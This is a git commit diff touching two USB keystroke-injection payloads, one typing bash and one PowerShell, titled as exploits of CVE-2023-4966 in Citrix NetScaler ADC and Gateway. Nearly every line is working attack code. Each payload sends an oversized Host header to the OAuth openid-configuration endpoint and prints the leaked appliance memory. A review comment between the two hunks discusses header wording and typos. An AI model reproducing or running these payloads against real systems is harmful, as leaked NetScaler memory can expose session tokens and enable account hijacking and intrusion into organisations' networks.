pull/671/head
Aleff 2024-06-11 08:13:22 +02:00
parent fd03dfda79
commit 463acb8559
2 changed files with 34 additions and 34 deletions


@ -1,38 +1,38 @@
* REM ##################################################################################
* REM # #
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################
#################################################################################
# #
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Citrix NetScaler ADV; NetScaler Gateway #
# #
#################################################################################
ATTACKMODE HID
QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
# 1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'
QUACK DELAY 3000
QUACK CTRL-ALT t
QUACK DELAY 1000
QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
QUACK STRING header_value=\$(yes a | head -n 24576 | tr -d '\n')
QUACK ENTER
QUACK DELAY 500
QUACK STRING headers=\"-H 'Host:$header_value'\"
QUACK STRING headers=\"-H 'Host:\$header_value'\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING response=$(curl -s -k -H \"$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10)
QUACK STRING response=\$(curl -s -k -H \"\$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10)
QUACK ENTER
QUACK DELAY 500
QUACK STRING if [ $? -eq 0 ] && [ \"$(echo $response | cut -c 1-3)\" == \"200\" ]; then
QUACK STRING if [ \$? -eq 0 ] && [ \"\$(echo \$response | cut -c 1-3)\" == \"200\" ]; then
QUACK ENTER
QUACK DELAY 500
QUACK STRING echo \"--- Dumped memory ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING echo \"$response\" | cut -c 131051-
QUACK STRING echo \"\$response\" | cut -c 131051-
QUACK ENTER
QUACK DELAY 500
QUACK STRING echo \"--- End ---\"
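Review bot: The rewritten header block (the `#` lines that replace the `* REM` lines at the top of this file, and the matching block at the top of the second file) still reads `Category : incident-response` under a title that says `Exploit ...`; the two should agree so that anyone triaging this repository can classify the payload from its header alone. `Target : Citrix NetScaler ADV` also looks like a typo for `ADC`, which the title itself uses — presumably the line is meant to be `# Target : Citrix NetScaler ADC; NetScaler Gateway #`, in both files. The placeholder comment is written `# 1) Define ...` here but `#1) Define ...` in the second file; a single form would be cleaner. The `if` opened on the last changed line of this hunk closes outside the shown lines, so the hunk should be read together with the rest of the file.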


@ -1,50 +1,50 @@
* REM ##################################################################################
* REM # #
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################
##################################################################################
# #
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Citrix NetScaler ADV; NetScaler Gateway #
# #
##################################################################################
ATTACKMODE HID
QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
#1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'
QUACK DELAY 3000
QUACK DELAY 1500
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 1000
QUACK STRING $header_value = 'a' * 24576
QUACK STRING \$header_value = 'a' * 24576
QUACK ENTER
QUACK DELAY 500
QUACK STRING $header_value = $header_value -replace \"\n\", \"\"
QUACK STRING \$header_value = \$header_value -replace \"\n\", \"\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers=\"-H 'Host:$header_value'\"
QUACK STRING \$headers=\"-H 'Host:\$header_value'\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers = @{'Host' = $header_value}
QUACK STRING \$headers = @{'Host' = \$header_value}
QUACK ENTER
QUACK DELAY 500
QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
QUACK STRING \$uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
QUACK STRING \$response = Invoke-RestMethod -Uri \$uri -Headers \$headers -Method GET -TimeoutSec 10
QUACK ENTER
QUACK DELAY 500
QUACK STRING if ($response.Substring(0, 3) -eq \"200\") {
QUACK STRING if (\$response.Substring(0, 3) -eq \"200\") {
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host \"--- Dumped memory ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response.Substring(131050) # 131051 - 1
QUACK STRING \$response.Substring(131050) # 131051 - 1
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host \"--- End ---\"